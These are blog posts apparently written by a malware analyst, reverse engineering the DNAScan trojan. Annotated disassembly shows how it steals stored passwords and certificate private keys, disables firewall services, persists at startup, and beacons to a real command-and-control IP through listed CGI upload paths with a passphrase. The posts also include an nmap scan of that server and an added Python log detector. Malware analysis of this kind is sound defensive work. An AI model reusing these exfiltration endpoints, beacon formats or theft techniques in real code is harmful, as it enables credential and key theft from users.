Saturday 28 November 2009

DNAScan Malicious Network Activity Reverse Engineering

In this blog post we will investigate in depth the actual functionalities of DNAScan,
which can be seen as a set of threads that accomplish different networking tasks:

* Server Functionalities
* Client Functionalities
* Malicious File Exchange
* Generic Backdoor

Let's start from the beginning of the network setup. First, the main thread calls WSAStartup to initialise the Winsock DLL, then a classical socket(), and immediately after that WSAIoctl:


0040A0EE PUSH 2600
0040A0F3 PUSH EAX
0040A0F4 PUSH EBX
0040A0F5 PUSH EBX
0040A0F6 PUSH 4004747F
0040A0FB PUSH ESI
0040A0FC CALL DWORD PTR DS:[41526C] ;WSAIoctl

The WSAIoctl function controls the mode of a socket and works like DeviceIoControl, so we have a suite of I/O control codes. In our case the control code is 4004747F, which corresponds to SIO_GET_INTERFACE_LIST.

SIO_GET_INTERFACE_LIST returns a list of configured IP interfaces and their parameters as an array of INTERFACE_INFO structures. After setting socket options and binding there is another WSAIoctl, this time with code 98000001; in this way the socket's normal working parameters are modified, since 98000001 corresponds to SIO_RCVALL, which enables a socket to receive all IP packets on the network. To use it, the socket must be a RAW socket using the IP protocol and bound to a specific local adapter: in other words DNAScan sets up a raw packet sniffer on the local interface, consistent with the sniffer_ftp_/sniffer_pop3_ strings seen later. Once this is done, the first thread is created:

0040A089 PUSH EAX
0040A08A PUSH ESI
0040A08B PUSH EDI
0040A08C PUSH OFFSET srcdll.00409FCD ; Look here to know what thread does
0040A091 PUSH ESI
0040A092 PUSH ESI
0040A093 CALL DWORD PTR DS:[415130]

After creating this thread, the first socket is closed. The next important function called is SHGetFolderPath, which resolves the user's Cookies folder (\user\cookies); finally execution jumps to a secondary thread that contains a recvfrom:

00409F89 PUSH EDI
00409F8A PUSH EDI
00409F8B PUSH EDI
00409F8C PUSH 4000
00409F91 PUSH ESI
00409F92 PUSH DWORD PTR SS:[EBP+8]
00409F95 CALL DWORD PTR DS:[415268] ;recvfrom

By watching the output buffer (second parameter) we can see what arrives at DNAScan, here a NetBIOS browser announcement over the \MAILSLOT\BROWSE mailslot captured from the LAN:


001644B8 E..a......=
001644D8 .... EFFGEJEMEDFCFJCNDFDGE
001644F8 CDFDIEEDIAA. FHEPFCELEHFCEPFFFAC
00164518 ACACACACACABN.SMB%.............
00164538 ............................
00164558 ......V......\MAILSLOT\BRO
00164578 WSE...........................

This recvfrom is repeated until certain conditions, which depend on what the application receives, are met;
under those conditions the server side answers with sendto. After this, another thread is built that uses the classical server architecture:

* Socket
* Listen
* Accept

Next networking operation is the Pipe building

00407DCF PUSH 0
00407DD1 PUSH 0
00407DD3 PUSH 400
00407DD8 PUSH 400
00407DDD PUSH 0FF
00407DE2 PUSH 0
00407DE4 PUSH 3
00407DE6 PUSH OFFSET srcdll.004025B4 ; ASCII "\\.\pipe\ie_down_pipe"
00407DEB CALL ; Jump to kernel32.CreateNamedPipeA
00407DF0 CMP EAX,-1
00407DF3 JNE SHORT 00407DF7
00407DF5 JMP SHORT 00407E58
00407DF7 MOV DWORD PTR SS:[EBP-4],EAX
00407DFA MOV DWORD PTR SS:[EBP-8],0
00407E01 PUSH 0
00407E03 PUSH DWORD PTR SS:[EBP-4]
00407E06 CALL ; Jump to kernel32.ConnectNamedPipe

This creates a named pipe \\.\pipe\ie_down_pipe and then, with ConnectNamedPipe, lets the named-pipe server wait for a client process to connect to an instance of the pipe.

At this point the following string is assembled:

00401620 http://%s%s?user_id=%.4u&version_id=%s&passphrase=%s&socks=%lu&v
00401660 ersion=%lu&crc=%.8x.URL: sniffer_ftp_%s..ftp_server=%s&ftp_login
004016A0 =%s&ftp_pass=%s&version=%lu.URL: sniffer_pop3_%s..pop3_server=%s
004016E0 &pop3_login=%s&ftp_pass=%s.URL: sniffer_imap_%s..imap_server=%s
00401720 &imap_login=%s&imap_pass=%s.URL: sniffer_icq_%s..icq_user=%s&icq
00401760 _pass=%s.SharedAccess.wscsvc.=.GET_COOK.VER.EXE.DL.DL_EXE.DL_EXE
004017A0 _ST.REBOOT.\%lu.exe./upd %lu

as you can see there are a couple of interesting strings like

  • ftp_pass=%s
  • imap_pass=%s
  • sniffer_pop3_%s
  • sniffer_icq_%s


0040587D PUSH EAX
0040587E PUSH DWORD PTR SS:[EBP-4] ;take a look here
00405881 PUSH 0
00405883 CALL ; Jump to wininet.FindFirstUrlCacheEntryA

This API enumerates the Internet cache; to see what comes out, just watch the second parameter:

0040588F MOV EAX,DWORD PTR SS:[EBP-4]
00405892 MOV ECX,DWORD PTR DS:[EAX+4]
00405895 PUSH ECX
00405896 PUSH DWORD PTR SS:[EBP+8]
00405899 PUSH ECX
0040589A CALL ; Jump to shlwapi.StrStrIA
0040589F POP ECX
004058A0 OR EAX,EAX
004058A2 JE SHORT 004058AA
004058A4 PUSH ECX
004058A5 CALL ; Jump to wininet.DeleteUrlCacheEntry
004058AA MOV DWORD PTR SS:[EBP-8],1000
004058B1 LEA EAX,[EBP-8]
004058B4 PUSH EAX
004058B5 PUSH DWORD PTR SS:[EBP-4]
004058B8 PUSH DWORD PTR SS:[EBP-0C]
004058BB CALL ; Jump to wininet.FindNextUrlCacheEntryA
004058C0 JMP SHORT 0040588B
004058C2 PUSH DWORD PTR SS:[EBP-0C]
004058C5 CALL ; Jump to wininet.FindCloseUrlCache

This piece of code scans the URL cache for the previously seen IP address and, if an entry matches (the StrStrIA check), removes it with DeleteUrlCacheEntry.

00405937 PUSH EAX
00405938 PUSH OFFSET srcdll.0040A872 ; ASCII "http://91.213.94.130/cgi-bin/options.cgi?user_id=373125111&version_id=17
&passphrase=fkjvhsdvlksdhvlsd&socks=9180&version=132&crc=00000000"
0040593D PUSH 0
0040593F CALL ; Jump to urlmon.URLOpenBlockingStreamA

Creates a blocking type stream object from a URL and downloads the data from the Internet. When the data is downloaded the client application or control can read it by using the IStream::Read method.

By analysing the URL we can extract the following information:

  • user_id=373125111
  • version_id=17
  • passphrase=fkjvhsdvlksdhvlsd
  • socks=9180
  • version=132
  • crc=00000000

When you step over URLOpenBlockingStreamA, be aware that this function spawns threads and fibers; to speed up the analysis and keep it simple, disable the New Thread break event for this single step. If you happen to have this event enabled, move between threads with Execute till Return and Run Actual Thread.

_Next Thread_

Here the malicious application scans C:\Documents and Settings\evilcry\Cookies\ cookie by cookie, building each full path with lstrcpyA/lstrcatA and deleting the file with DeleteFileA:

00408305 PUSH DWORD PTR SS:[EBP+8] ; ASCII "C:\Documents and Settings\evilcry\Cookies\"
00408308 PUSH EDI
00408309 CALL ; Jump to kernel32.lstrcpyA
0040830E MOV EDX,DWORD PTR SS:[EBP-8]
00408311 LEA EDX,[EDX+2C]
00408314 PUSH EDX
00408315 PUSH EDI
00408316 CALL ; Jump to kernel32.lstrcatA
0040831B PUSH EDI
0040831C CALL ; Jump to kernel32.DeleteFileA
00408321 PUSH DWORD PTR SS:[EBP-8]
00408324 PUSH DWORD PTR SS:[EBP-4]
00408327 CALL ; Jump to kernel32.FindNextFileA
0040832C TEST EAX,EAX
0040832E JNE SHORT 004082E5
00408330 PUSH DWORD PTR SS:[EBP-4]
00408333 CALL ; Jump to kernel32.FindClose

Next, as usual, by using CreateToolhelp32Snapshot, Process32First/Process32Next and WriteProcessMemory, DNAScan injects pieces of code into various system processes. This is not really useful for the scope of our analysis, so we move on.


0040795B 55 PUSH EBP
0040795C 8BEC MOV EBP,ESP
0040795E 83C4 F8 ADD ESP,-8
00407961 53 PUSH EBX
00407962 E8 57F6FFFF CALL 00406FBE

Inside the call

00406FC9 PUSH OFFSET srcdll.0040B87E
00406FCE PUSH 1
00406FD0 PUSH 0
00406FD2 CALL ; Jump to OLE32.CreateStreamOnHGlobal

The CreateStreamOnHGlobal function creates a stream object that uses an HGLOBAL memory handle to store the stream contents. This object is the OLE-provided implementation of the IStream interface.

..
00406FE1 PUSH OFFSET srcdll.0040B87A
00406FE6 PUSH srcdll.00401B50 ; ASCII "pstorec.dll"
00406FEB CALL 00406F71 ; Loads from pstorec.dll PStoreCreateInstance
00406FF0 TEST EAX,EAX
00406FF2 JE SHORT 00407033
00406FF4 PUSH OFFSET srcdll.0040B882
00406FF9 PUSH srcdll.00401B73 ; ASCII "crypt32.dll"
CALL 00406F71 ; Loads from crypt32.dll CryptUnprotectData

00407009 PUSH EAX
0040700A PUSH EAX
0040700B PUSH EAX
0040700C LEA EDX,[40B876]
00407012 PUSH EDX
00407013 CALL DWORD PTR DS:[40B87A] ;PStoreCreateInstance

Protected Storage (Pstore) is available for use in Windows Server 2003, Windows XP, and Windows 2000. It is only available for read-only operations in Windows Server 2008 and Windows Vista. Pstore uses an older implementation of data protection.

Outside the call:

00407972 E8 AB290000 CALL ; Jump to OLE32.GetHGlobalFromStream

The GetHGlobalFromStream function retrieves the global memory handle of a stream that was created through a call to CreateStreamOnHGlobal. The second parameter is an output parameter that receives that global memory handle.


00407977 53 PUSH EBX
00407978 E8 68B4FFFF CALL 00402DE5
0040797D 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
00407980 FF75 FC PUSH DWORD PTR SS:[EBP-4]
00407983 E8 662A0000 CALL ; Jump to kernel32.GlobalLock

Now if we look at the memory pointed to by EAX we can see a truly interesting thing:

0016E5D8 Forms: ....URL Form / Auto: http://xxxxxxxxxxxxx.com/wp
0016E618 -login.php..User/Pass: xxxxxx:....URL Form / Auto: http://
0016E658 www.xxxxxxxx/forums/..User/Pass: Evilcry:xxxxxxxxxx
0016E698 (Modified: 17/10/2009 15:02)

As you can see, the malicious application extracts URLs together with user names and passwords from Protected Storage (the IE form autocomplete data). Now it will surely try to send the stolen credentials to a malicious server.


00407988 0BC0 OR EAX,EAX
0040798A 74 16 JE SHORT 004079A2
0040798C FF75 F8 PUSH DWORD PTR SS:[EBP-8]
0040798F 50 PUSH EAX
00407990 68 6A104000 PUSH srcdll.0040106A ; ASCII "/cgi-bin/pstore.cgi"
00407995 E8 CDEBFFFF CALL 00406567
0040799A FF75 FC PUSH DWORD PTR SS:[EBP-4]
0040799D E8 522A0000 CALL ; Jump to kernel32.GlobalUnlock

Inside -> CALL 00406567

00406570 PUSH EBX
00406571 PUSH 0
00406573 PUSH 0
00406575 PUSH 0
00406577 PUSH 0
00406579 PUSH OFFSET srcdll.004025AC ; ASCII "IE"
0040657E CALL ; Jump to wininet.InternetOpenA

Initializes an application's use of the WinINet functions; the return value must be non-NULL.

00406583 OR EAX,EAX
00406585 JE 0040672C
0040658B MOV DWORD PTR SS:[EBP-4],EAX
0040658E PUSH 0
00406590 PUSH 0
00406592 PUSH 3
00406594 PUSH 0
00406596 PUSH 0
00406598 PUSH 0
0040659A PUSH DWORD PTR DS:[402020] ; ASCII "91.213.94.130"
004065A0 PUSH DWORD PTR SS:[EBP-4]
004065A3 CALL ; Jump to wininet.InternetConnectA

Opens a File Transfer Protocol (FTP) or HTTP session for a given site, here 91.213.94.130 (the PUSH 3 is dwService = INTERNET_SERVICE_HTTP).

004065B3 PUSH 0
004065B5 PUSH 4080000
004065BA PUSH 0
004065BC PUSH 0
004065BE PUSH 0
004065C0 PUSH DWORD PTR SS:[EBP+8]
004065C3 PUSH OFFSET srcdll.004025AF ; ASCII "POST"
004065C8 PUSH DWORD PTR SS:[EBP-8]
004065CB CALL ; Jump to wininet.HttpOpenRequestA

Opens an HTTP POST request to /cgi-bin/pstore.cgi (the path is the first argument of the routine, EBP+8).

00406618 PUSH 20000000
0040661D PUSH EAX
0040661E LEA EAX,[EBP-14C]
00406624 PUSH EAX
00406625 PUSH DWORD PTR SS:[EBP-0C]
00406628 CALL ; Jump to wininet.HttpAddRequestHeadersA

Adds one or more HTTP request headers to the HTTP request handle, the second parameter is a Pointer
to a string variable containing the headers to append to the request, so let's check it.

Content-Type: multipart/form-data; boundary=--------------------------2ffe24e2ffe24e2ffe24e


Finally, wsprintfA builds the following string:


0012FCB4 ..----------------------------2ffe24e2ffe24e2ffe24e--......#.
0012FCF4 .l. |...........|.|.l|...#.`..@Z|...a..P
0012FD34 Content-Disposition: form-data; name="upload_file"; filename="37
0012FD74 3125111.17"

where we can see the form field name="upload_file" and the filename "373125111.17" (split across two dump lines), i.e. user_id.version_id.

Finally the request is sent:

004066F6 PUSH EBX
004066F7 PUSH DWORD PTR SS:[EBP-154]
004066FD PUSH 0
004066FF PUSH 0
00406701 PUSH DWORD PTR SS:[EBP-0C]
00406704 CALL ; Jump to wininet.HttpSendRequestA

Sends the specified request to the HTTP server, the second parameter of this function is the header itself.

At this point the HTTP transactions are finished, all handles are closed and a new thread begins, which deals with the CryptoAPI.

00406737 PUSH EDI
00406738 PUSH srcdll.00401594 ; ASCII "MY"
0040673D PUSH 0
0040673F CALL ; Jump to CRYPT32.CertOpenSystemStoreA

The CertOpenSystemStore function is a simplified function that opens the most common system certificate stores; "MY" is the store that holds the user's certificates with their associated private keys.

00406756 PUSH 4
00406758 PUSH 0
0040675A PUSH srcdll.00401597 ; UNICODE "Password"
0040675F LEA EAX,[EBP-8]
00406762 PUSH EAX
00406763 PUSH DWORD PTR SS:[EBP-0C]
00406766 CALL ; Jump to CRYPT32.PFXExportCertStoreEx

The PFXExportCertStoreEx function exports the certificates and, if available, their associated private keys from
the referenced certificate store.

In this way DNAScan obtains sensitive information, like the private keys.

The second parameter is a pointer to a CRYPT_DATA_BLOB structure that receives the PFX packet with the exported certificates and keys. The third parameter is the password used to encrypt and verify the PFX packet, here the literal "Password". The last PUSH 4 is dwFlags = EXPORT_PRIVATE_KEYS, which asks for the private keys to be included.

0040677E PUSH 4
00406780 PUSH 0
00406782 PUSH srcdll.00401597 ; UNICODE "Password"
00406787 LEA EAX,[EBP-8]
0040678A PUSH EAX
0040678B PUSH DWORD PTR SS:[EBP-0C]
0040678E CALL ; Jump to CRYPT32.PFXExportCertStoreEx

This is a second call with the same arguments: in the documented usage of PFXExportCertStoreEx, the first call with an empty blob only reports the required size, and the second call fills the allocated buffer with the PFX packet.

Now the certificates are stolen and need to be sent to the malicious server. Indeed, a few lines later we see the following:

00406797 PUSH DWORD PTR SS:[EBP-8]
0040679A PUSH EDI
0040679B PUSH srcdll.00401058 ; ASCII "/cgi-bin/cert.cgi"
004067A0 CALL 00406567

The stolen certificates are sent to /cgi-bin/cert.cgi through the same routine (CALL 00406567) seen for the Protected Storage credentials.

Essentially the application uploads each kind of sensitive information to a precise location; here is a quick list:

  • /cgi-bin/options.cgi
  • /cgi-bin/forms.cgi
  • /cgi-bin/cert.cgi
  • /cgi-bin/pstore.cgi
  • /cgi-bin/ss.cgi
  • /cgi-bin/keylog.cgi
  • /cgi-bin/file.cgi
  • /cgi-bin/mail.cgi
  • /cgi-bin/cmd.cgi

From the names of these CGIs we can immediately understand what is stolen:

  • Files
  • Mails
  • Passwords
  • Certificates
  • Misc.
If we attempt direct browser access to the malicious server we obtain a classical 404 error, but
let's try sending direct queries like:

http://91.213.94.130/cgi-bin/options.cgi?user_id=373125111&version_id=17&passphrase=fkjvhsdvlksdhvlsd&socks=9180&version=132&crc=00000000

As you can see, options.cgi is reached and correctly downloaded. We can proceed with a deeper inspection by using Nmap.

The scanning options used are typical of an Intense Scan:

Starting Nmap 4.76 ( http://nmap.org ) at 2009-11-28 16:39 ora solare Europa occidentale
Initiating Ping Scan at 16:39
Scanning 91.213.94.130 [5 ports]
Completed Ping Scan at 16:39, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:39
Completed Parallel DNS resolution of 1 host. at 16:39, 0.15s elapsed
Initiating SYN Stealth Scan at 16:39
Scanning 91.213.94.130 [1000 ports]
Increasing send delay for 91.213.94.130 from 0 to 5 due to max_successful_tryno increase to 5
Increasing send delay for 91.213.94.130 from 5 to 10 due to max_successful_tryno increase to 6
Warning: Giving up on port early because retransmission cap hit.
Discovered open port 22/tcp on 91.213.94.130
Discovered open port 80/tcp on 91.213.94.130
SYN Stealth Scan Timing: About 12.40% done; ETC: 16:43 (0:03:32 remaining)
Discovered open port 5222/tcp on 91.213.94.130
Discovered open port 111/tcp on 91.213.94.130

But we can obtain more information with a slow intense scan like:

nmap -PE -PA21,23,80,3389 -A -v -T4 91.213.94.130

Here is what emerges.

Open ports:
  • 22
  • 25 (filtered)
  • 80 (lighttpd 1.4.19)
  • 111 (rpcbind)
  • 5222 (Jabber instant messaging server)
  • 5269 (Jabber instant messaging server)
  • 389 (ms-term-serv)

Operating system: OpenWrt 7.09 (Linux 2.6.22)

Regards,
Giuseppe 'Evilcry' Bonfa'

Sunday 15 November 2009

DNAScan Malware Analysis from Browser to the Code #2

00370DE5 MOV EDX,DWORD PTR SS:[EBP+10]
00370DE8 MOV EAX,DWORD PTR DS:[EDX+20]
00370DEB CALL EAX ;LoadLibrary("ntdll.dll")
00370DED MOV DWORD PTR SS:[EBP-0F8],EAX
00370DF3 MOV ECX,DWORD PTR SS:[EBP-28]

After loading the libraries and building a complete import table, execution comes back to the main code
via this gate:

00372086 XOR EAX,EAX
00372088 JMP DWORD PTR SS:[EBP-1C] ; jump 00409647
0037208B MOV ESP,EBP


The interesting part begins here:

0040964D PUSH 0
0040964F PUSH 0
00409651 PUSH OFFSET feedback_-_DNAScan.004027A8 ; ASCII "EnableLUA"
00409656 PUSH OFFSET feedback_-_DNAScan.0040276E ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
0040965B PUSH 80000002
00409660 CALL 0040623E ; Registry Operations

This call attempts to open the specified key (80000002 = HKEY_LOCAL_MACHINE) with RegOpenKeyA and then
queries the EnableLUA value; after taking the needed values, execution jumps here:

004096DC MOV DWORD PTR DS:[402020],feedback_-_DNA ; ASCII "91.213.94.130"
004096E6 PUSH OFFSET feedback_-_DNAScan.0040938F

As you can see we have a static IP address, which will surely be added as a trusted IP to the
system security policies ;)

004093F1 CALL ; Jump to kernel32.GetTickCount
004093F6 XOR EDX,EDX
004093F8 MOV ECX,7530
004093FD DIV ECX
004093FF ADD EDX,400
00409405 MOV DWORD PTR DS:[401568],EDX ;Store random number
0040940B PUSH feedback_-_DNAScan.00401769 ; ASCII "SharedAccess"

GetTickCount is used as a source of randomness: the tick count is divided by 7530h (30000) and the remainder plus 400h (1024) is stored at 401568, so the value lies between 1024 and 31023. This is the socks= value that later appears in the C&C URL. Next, OpenSCManagerA is called in order to reach the SharedAccess service:

00407EB2 PUSH EDX
00407EB3 PUSH 1
00407EB5 PUSH EAX
00407EB6 CALL ; Jump to ADVAPI32.ControlService

ControlService sends a control code to a service:

BOOL WINAPI ControlService(
__in SC_HANDLE hService,
__in DWORD dwControl,
__out LPSERVICE_STATUS lpServiceStatus
);

Here dwControl is 1, SERVICE_CONTROL_STOP, and the service is SharedAccess (Windows Firewall/Internet Connection Sharing). In this way DNAScan disables Windows security, precisely the Windows Firewall.

00409415 PUSH feedback_-_DNAScan.00401776 ; ASCII "wscsvc"
0040941A CALL 00407E5C

wscsvc is the Windows Security Center service, which is disabled in the same way as seen above.

0040629C CALL ; Jump to kernel32.GetModuleFileNameA
004062A1 PUSH 104
004062A6 LEA EAX,[EBP-20E]
004062AC PUSH EAX
004062AD CALL ; Jump to kernel32.GetWindowsDirectoryA
004062B2 PUSH feedback_-_DNAScan.0040113C ; ASCII "\srcdll.exe"
004062B7 LEA EAX,[EBP-20E]
004062BD PUSH EAX
004062BE CALL ; Jump to kernel32.lstrcatA
004062C3 LEA EAX,[EBP-4]
004062C6 PUSH EAX
004062C7 PUSH feedback_-_DNAScan.004015BA ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
004062CC PUSH 80000001
004062D1 CALL ; Jump to ADVAPI32.RegCreateKeyA
004062D6 LEA EAX,[EBP-20E]
004062DC PUSH EAX
004062DD CALL ; Jump to kernel32.lstrlen
004062E2 INC EAX
004062E3 PUSH EAX
004062E4 LEA EAX,[EBP-20E]
004062EA PUSH EAX
004062EB PUSH 1
004062ED PUSH 0
004062EF PUSH feedback_-_DNAScan.00401136 ; ASCII "ttool"
004062F4 PUSH DWORD PTR SS:[EBP-4]
004062F7 CALL ; Jump to ADVAPI32.RegSetValueExA
004062FC PUSH DWORD PTR SS:[EBP-4]
004062FF CALL ; Jump to ADVAPI32.RegCloseKey

This piece of code builds the path %WINDIR%\srcdll.exe (GetWindowsDirectoryA + "\srcdll.exe"), the location of the malicious copy, and then registers it as a startup application through the value "ttool" under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run (80000001 = HKEY_CURRENT_USER), so the malware survives an OS reboot.

00406334 PUSH 0
00406336 PUSH 0
00406338 PUSH OFFSET feedback_-_DNAScan.00402570 ; ASCII "RF"
0040633D PUSH OFFSET feedback_-_DNAScan.004027B2 ; ASCII "Software\Microsoft\InetData"
00406342 PUSH 80000001
00406347 CALL 0040623E

This sets a new registry entry under HKEY_CURRENT_USER\Software\Microsoft\InetData. After setting this entry, GetCommandLine is called and its result parsed: if no argument is specified execution
jumps to ShellExecuteA; if we change this, execution jumps to the most interesting part.

The following code is MultiThreaded so be sure to have enabled correct Events, like Break on New Thread.

DNAScan opens sockets and, in various threads, performs queries to the IP previously added to the security policies. Here is an interesting piece of code that assembles a URL containing the passphrase:

004088AD PUSH 0
004088AF PUSH 84
004088B4 PUSH DWORD PTR DS:[401568]
004088BA PUSH srcdll.00401124 ; ASCII "fkjvhsdvlksdhvlsd"
004088BF PUSH OFFSET srcdll.0040A7D6 ; ASCII "17"
004088C4 PUSH EAX
004088C5 PUSH srcdll.004010EA ; ASCII "/cgi-bin/cmd.cgi"
004088CA PUSH DWORD PTR DS:[402020] ; ASCII "91.213.94.130"
004088D0 PUSH srcdll.00401620 ; ASCII "http://%s%s?user_id=%.4u&version_id=%s&passphrase=%s&socks=%lu&version=%lu&crc=%.8x"
004088D5 PUSH OFFSET srcdll.0040B072
004088DA CALL ; Jump to USER32.wsprintfA

The final string is:

http://91.213.94.130/cgi-bin/cmd.cgi?user_id=373125111&version_id=17&passphrase=fkjvhsdvlksdhvlsd&socks=7633&version=132&crc=00000000

from which we can extract the passphrase and CRC:

passphrase=fkjvhsdvlksdhvlsd
crc=00000000

(socks=7633 is the GetTickCount-derived value stored at 401568, which is why it differs between runs: 9180 in the other capture.)
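As an added example (not code from the post), here is a small Python detector for this beacon format, run over constructed proxy log lines: it checks the /cgi-bin/*.cgi endpoints listed in the analysis, the fixed field order of the wsprintfA format string, and the socks= range implied by the GetTickCount arithmetic (0x400 + n mod 0x7530). The log line layout (timestamp, client, method, URL) is an assumption.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Upload endpoints named in the analysis (all under /cgi-bin/).
CGI_ENDPOINTS = {
    "options.cgi", "forms.cgi", "cert.cgi", "pstore.cgi", "ss.cgi",
    "keylog.cgi", "file.cgi", "mail.cgi", "cmd.cgi",
}
# Query fields, in the order of the wsprintfA format string.
BEACON_FIELDS = ("user_id", "version_id", "passphrase", "socks", "version", "crc")
# socks = (GetTickCount % 0x7530) + 0x400, so it always lies in this range.
SOCKS_MIN, SOCKS_MAX = 0x400, 0x400 + 0x7530 - 1


def parse_beacon(url: str) -> Optional[Dict[str, str]]:
    """Return the beacon fields if `url` matches the DNAScan request format, else None."""
    parts = urlsplit(url)
    if parts.scheme != "http" or not parts.path.startswith("/cgi-bin/"):
        return None
    endpoint = parts.path[len("/cgi-bin/"):]
    if endpoint not in CGI_ENDPOINTS:
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    # The format string emits each field exactly once, in a fixed order.
    if list(query) != list(BEACON_FIELDS) or any(len(v) != 1 for v in query.values()):
        return None
    fields = {k: query[k][0] for k in BEACON_FIELDS}
    # %.4u: at least four decimal digits; %lu: decimal; %.8x: eight hex digits.
    if not fields["user_id"].isdigit() or len(fields["user_id"]) < 4:
        return None
    if not fields["version"].isdigit() or not fields["socks"].isdigit():
        return None
    if not re.fullmatch(r"[0-9a-f]{8}", fields["crc"]):
        return None
    if not SOCKS_MIN <= int(fields["socks"]) <= SOCKS_MAX:
        return None
    return {"host": parts.hostname, "endpoint": endpoint, **fields}


def scan_proxy_log(lines: List[str]) -> List[Dict[str, str]]:
    """Run parse_beacon over the URL column of each log line and collect the hits."""
    hits = []
    for line in lines:
        columns = line.split()
        if len(columns) < 4:
            continue
        beacon = parse_beacon(columns[3])
        if beacon:
            beacon["client"] = columns[1]
            hits.append(beacon)
    return hits


# Constructed log lines: two beacons assembled from the values in the listings
# above, one benign request to a same-named CGI, and one ordinary page fetch.
SAMPLE_LOG = [
    "2009-11-15T10:01:02 10.0.0.7 GET http://91.213.94.130/cgi-bin/options.cgi"
    "?user_id=373125111&version_id=17&passphrase=fkjvhsdvlksdhvlsd&socks=9180&version=132&crc=00000000",
    "2009-11-15T10:01:03 10.0.0.7 GET http://91.213.94.130/cgi-bin/cmd.cgi"
    "?user_id=373125111&version_id=17&passphrase=fkjvhsdvlksdhvlsd&socks=7633&version=132&crc=00000000",
    "2009-11-15T10:01:05 10.0.0.9 GET http://example.com/cgi-bin/options.cgi?page=3",
    "2009-11-15T10:01:06 10.0.0.9 GET http://example.com/index.html",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit["client"], "->", hit["host"], hit["endpoint"], "socks", hit["socks"])
```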

We also have a pipe creation:

00407DCF PUSH 0
00407DD1 PUSH 0
00407DD3 PUSH 400
00407DD8 PUSH 400
00407DDD PUSH 0FF
00407DE2 PUSH 0
00407DE4 PUSH 3
00407DE6 PUSH OFFSET srcdll.004025B4 ; ASCII "\\.\pipe\ie_down_pipe"
00407DEB CALL ; Jump to kernel32.CreateNamedPipeA
Saturday 14 November 2009

DNAScan Malware Analysis from Browser to the Code #1

This time we are going to see how DNAScan works.
Essentially this malware presents three major functionalities:

  • Downloads other files from the Internet.
  • Creates a startup registry entry.
  • Rootkit functionality: hides its presence on the infected machine in order to perform malicious actions without the user's knowledge.

Basic information about the malicious file:

MD5: 19D937A7A0532926FE1A8FADD7AA96FF
CompanyName: tzuk
FileDescription: Sandboxie Start
LegalCopyright: Copyright © 2004-2008 by Ronen Tzur
OriginalFilename: Start.exe

DNAScan is hosted on a fake PHP page; here is the route from the browser to the malicious code:

Trace
TTL  LFT trace to 195.93.208.6:80/tcp
1 [AS15968] [RIPE-C3/NETPILOTGMBH-DE] gwy.netpilot.net (62.67.240.1) 0.5/0.4ms
2 [AS15968] [RIPE-C3/NETPILOTGMBH-DE] gwy34.netpilot.net (62.67.240.17) 0.7/0.9ms
3 [AS15968] [RIPE-C3/NETPILOTGMBH-DE] l3gate1.netpilot.net (62.67.194.62) 90.0/2.3ms
4 [AS3356] [RIPE-NCC-212/UK-LVLT-990218] gi-6-3.car1.Munich1.Level3.net (212.162.1.65) 330.4/20.8ms
5 [AS3356] [LVLT-ORG-4-8] ae-4-4.ebr1.Frankfurt1.Level3.net (4.69.134.2) 198.0/8.1ms
6 [AS3356] [LVLT-ORG-4-8] ae-91-91.csw4.Frankfurt1.Level3.net (4.69.140.14) 51.5/18.0ms
7 [AS3356] [LVLT-ORG-4-8] ae-41-99.car1.Frankfurt1.Level3.net (4.68.23.195) 95.4/8.1ms
8 [AS3356] [RIPE-C3/FRANKFURT-SERIAL2] 62.67.38.50 533.9/12.9ms
9 [AS8359] [RIPE-CBLK3/MTU-BTN] bor-cr01-po3.spb.stream-internet.net (195.34.53.101) 396.0/55.1ms
10 [AS8359] [RIPE-CBLK3/MTU-BTN] m9-crs-1-be1.msk.stream-internet.net (195.34.53.125) 516.4/56.3ms
11 [AS8359] [RIPE-CBLK3/TRADITION-NET] m9-cr02-po6.msk.stream-internet.net (195.34.59.242) 380.7/83.0ms
12 * [AS8359] [RIPE-CBLK3/MTU-SL5] GarantPark-m9.msk.stream-internet.net (195.34.36.154) 48.0ms
13 [AS5537] [89-RIPE/RU-GPT-20060426] 89.111.160.209 348.0/98.8ms
14 * [AS5537] [89-RIPE/RU-GPT-20060426] 89.111.143.18 48.4ms
15 * [AS25189] [RIPE-213/NLINE-USERS-NET] phone.nline.ru (213.251.192.26) 48.3ms
** [firewall] the next gateway may statefully inspect packets
16 [AS31366] [RIPE-CBLK3/smallshop] mail.smallshopkz.org (195.78.122.2) 477.6/110.0ms
17 * [AS44349] [RIPE-CBLK3/MEDLAIF-NET] [target] 195.93.208.6:80 110.8/*/*/*ms

LFT's trace took 10.63 seconds. Resolution required 76.96 seconds.
Session Transcription

---request begin---
GET /feedback.php?page=3 HTTP/1.0
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; en-US)
Accept: */*
--request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.0 200 OK
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny3
Content-Type: application/octet-stream
Content-Length: 69120
Date: Fri, 13 Nov 2009 14:02:42 GMT
Server: lighttpd/1.4.19

---response end---

HTTP/1.0 200 OK
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny3
Content-Type: application/octet-stream
Content-Length: 69120
Date: Fri, 13 Nov 2009 14:02:42 GMT
Server: lighttpd/1.4.19
Length: ignored [application/octet-stream]

0K .......... .......... .......... .......... .......... 110.58 KB/s
50K .......... ....... 164.61 KB/s

Closed fd 19
13:43:28 (120.86 KB/s) - `/tmp/BARM7NqKY' saved [69120]

Host: 100creativeideas.cn

Be aware that with certain engines the download does not work; precisely, the session transaction
is dropped.

Now let's check the downloaded malicious executable.

As you can see, the structure of this PE is a bit suspect because it appears to be limited to four functions and does not present a true execution flow from a static point of view; this means
that the application is packed/encrypted. Let's reverse it from the entry point to decode the application.

004012E4 start:
004012E4 push ebp
004012E5 push ebp
004012E6 pushf
004012E7 xor ebp, ebp
004012E9 push eax
004012EA mov ebp, eax
004012EC add ebp, 38884h
..
004013D0 call ds:CLSIDFromOle1Class

EAX contains 80070057

00401617 push edx
00401618 call loc_401000 ;Decodes a piece of code
0040161D add esp, 18h
..
